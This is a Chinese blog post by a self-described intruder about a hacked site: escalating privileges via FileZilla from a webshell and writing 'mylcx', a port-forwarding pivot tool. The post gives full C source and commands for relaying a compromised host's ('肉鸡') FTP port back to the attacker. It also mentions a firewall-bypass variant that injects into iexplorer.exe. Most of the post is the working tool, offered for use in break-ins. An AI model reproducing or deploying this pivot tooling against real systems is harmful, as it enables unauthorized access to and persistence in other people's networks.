lcx不能转发ftp解决

原创 2011年01月24日 00:02:00

上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。

我没看过lcx的源码~所以不知道为什么它不能转发ftp

下面是我自己写的一个lcx,姑且叫做mylcx吧 !


(另外我还弄了一个穿墙的lcx,嘿嘿,其实也没什么技术含量了,就是把自己插到iexplorer.exe或者其他可使用网络的文件,像flashxp.exe ,等等了~,写个lcx或者其他随便表示一下就行)



mylcx -listen 这个命令跟lcx一样
  mylcx -slave 本机端口 远程ip 远程端口
                   即把本机端口映射到远程ip的一个端口上



     在本机执行:mylcx -listen 5000 21

    在肉鸡上执行:mylcx -slave 21 你的ip 5000

  然后连接ftp 127.0.0.1 就可以登录远程的ftp了

附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)

#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment(lib,"Ws2_32")

HANDLE hevent;

 

typedef struct _s1ands2
{
 SOCKET s1;
 SOCKET s2;
} s1ands2;

typedef struct _info{
 int listenorslave; //1-listen 2-slave
 unsigned short listen_port1;
 unsigned short listen_port2;
 unsigned short slave_local;
 char remoteip[16];
 unsigned short remoteport;
} info;

 

DWORD WINAPI s1tos2(LPVOID p)
{
 s1ands2* temp=(s1ands2*)p;
 char buff[2048]={0};
 int bytesdone;

 SOCKET s1,s2;
 s1=temp->s1;
 s2=temp->s2;
 while(1)
 {
  int errorcode;
  bytesdone=recv(s1,buff,2048,0);
 
  errorcode=GetLastError();
  if(bytesdone<=0)
  //if(bytesdone<=0)
  {
   SetEvent(hevent);
   return 0;
  }
  printf("%d bytes=%d/n",errorcode,bytesdone);
  bytesdone=send(s2,buff,bytesdone,0);
  errorcode=GetLastError();
  //if(errorcode>0)
  if(bytesdone<=0)
  {
   SetEvent(hevent);
   return 0;
  }

 }
 return 0;

}


/*

DWORD WINAPI s2tos1(LPVOID p)
{
 s1ands2* temp=(s1ands2*)p;
 char buff[2048]={0};
 int bytesdone;

 SOCKET s1,s2;
 s1=temp->s1;
 s2=temp->s2;
 while(1)
 {
  bytesdone=recv(s2,buff,2048,0);
  send(s1,buff,bytesdone,0);
 }

 return 0;

}


*/


int lcxlisten(unsigned short p1,unsigned short p2)
{
 SOCKET s1,s2,rs1,rs2;
 
 unsigned short port1,port2;

 int len1,len2;

 port1=p1;

 port2=p2;

 s1=socket(AF_INET,SOCK_STREAM,0);

 sockaddr_in addr1,addr2;
 sockaddr_in raddr1,raddr2;

 addr1.sin_family=AF_INET;

 addr1.sin_addr.S_un.S_addr=INADDR_ANY;

 addr1.sin_port=htons(port1);

 addr2.sin_family=AF_INET;

 addr2.sin_addr.S_un.S_addr=INADDR_ANY;

 addr2.sin_port=htons(port2);

 bind(s1,(const sockaddr *)&addr1,sizeof(addr1));

 s2=socket(AF_INET,SOCK_STREAM,0);

 bind(s2,(const sockaddr *)&addr2,sizeof(addr2));

 listen(s1,5);

 listen(s2,5);

 len1=sizeof(raddr1);

 len2=sizeof(raddr2); 

 printf("waiting on port %d.../n",port1);

 rs1=accept(s1,(struct sockaddr *)&raddr1,&len1);

 printf("%s connected/n",inet_ntoa(raddr1.sin_addr));

 printf("wating on port %d.../n",port2);

 rs2=accept(s2,(struct sockaddr *)&raddr2,&len2);

 printf("go.../n");

 s1ands2 temp1,temp2;

 temp1.s1=rs1;

 temp1.s2=rs2;

 CreateThread(NULL,NULL,s1tos2,&temp1,NULL,NULL);
 
 temp2.s1=rs2;

 temp2.s2=rs1;

 CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

 hevent=CreateEvent(NULL,false,false,NULL);

 //hevent[1]=CreateEvent(NULL,false,false,NULL);

 //WaitForMultipleObjects(2,&hevent,false,INFINITE);


 WaitForSingleObject(hevent,INFINITE);
 printf("end waiting1/n");
 CloseHandle(hevent);
 closesocket(rs1);
 closesocket(rs2);
 closesocket(s1);
 closesocket(s2);


 return 0;
}

int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
 WSADATA wsa;

 WSAStartup(MAKEWORD(2,2),&wsa);

 SOCKET s1,s2;

 sockaddr_in addr1,addr2;

 addr1.sin_family=AF_INET;

 addr1.sin_addr.S_un.S_addr=inet_addr(remoteip);

 addr1.sin_port=htons(remoteport);

 s1=socket(AF_INET,SOCK_STREAM,0);

 if(connect(s1,(const struct sockaddr*)&addr1,sizeof(addr1)))
 {
  closesocket(s1);
  return 0;
 }

 s2=socket(AF_INET,SOCK_STREAM,0);

 addr2.sin_family=AF_INET;

 addr2.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");

 addr2.sin_port=htons(local);

 if(connect(s2,(const struct sockaddr*)&addr2,sizeof(addr2)))
 {
  closesocket(s1);
  closesocket(s2);
  return 0;
 }

 s1ands2 temp,temp2;

 temp.s1=s1;

 temp.s2=s2;

 CreateThread(NULL,NULL,s1tos2,&temp,NULL,NULL);

 temp2.s1=s2;

 temp2.s2=s1;

 CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

 hevent=CreateEvent(NULL,false,false,NULL);

 //hevent[1]=CreateEvent(NULL,false,false,NULL);

 //WaitForMultipleObjects(2,&hevent,false,INFINITE);


 WaitForSingleObject(hevent,INFINITE);
 
 printf("end waiting2/n");

 CloseHandle(hevent);
 closesocket(s1);
 closesocket(s2);

 return 0;
}

int main(int argc, char* argv[])
{
 WSADATA wsa;
 WSAStartup(MAKEWORD(2,2),&wsa);
 if(argc<2)
 {
  printf("usage:mylcx.exe -listen port1 port2/n"
   "mylcx.exe -slave localport remoteip remoteport/n");
  return 0;
 }
 if(strcmp(argv[1],"-listen")==0)
 {
  while(1){
   lcxlisten(atoi(argv[2]),atoi(argv[3]));
   Sleep(1000);
  }
  return 0;
 }


 if(strcmp(argv[1],"-slave")==0)
 {
  while(1)
  {
   lcxslave(atoi(argv[2]),argv[3],atoi(argv[4]));
   Sleep(1000);
  }
  return 0;

 }
 //lcxlisten(5000,21);
 //lcxslave(800,"127.0.0.1",5000);
 return 0;
}

 

 

 

 

 

                                                                                                                                                     [本文转载]

版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

linux下内网端口转发工具:linux版lcx 使用方法

这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I...
  • wyvbboy
  • wyvbboy
  • 2017年03月14日 10:19
  • 1209

攻防实战:使用Lcx进行内网端口转发

在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因,很难实现它;例如局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此...
  • s98
  • s98
  • 2012年01月10日 11:51
  • 832

端口转发lcx.exe

  • 2014年05月06日 12:07
  • 48KB
  • 下载

lcx端口转发工具的使用

Linux版lcx端口转发工具使用 0x01 前言 在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通...

lcx 转发工具

  • 2013年06月02日 00:05
  • 419KB
  • 下载

lcx.exe 端口转发工具

  • 2013年08月23日 22:07
  • 160KB
  • 下载

解决linux不能使用ftp问题

[root@lx01 etc]# rpm -qa |grep ftp ---检查是否安装了ftp lftp-3.7.11-4.el5 ftp-0.17-35.el5 tftp-s...

FTP用于解决局域网不能共享问题

  • 2011年07月31日 12:57
  • 34KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:lcx不能转发ftp解决
举报原因:
原因补充:

(最多只允许输入30个字)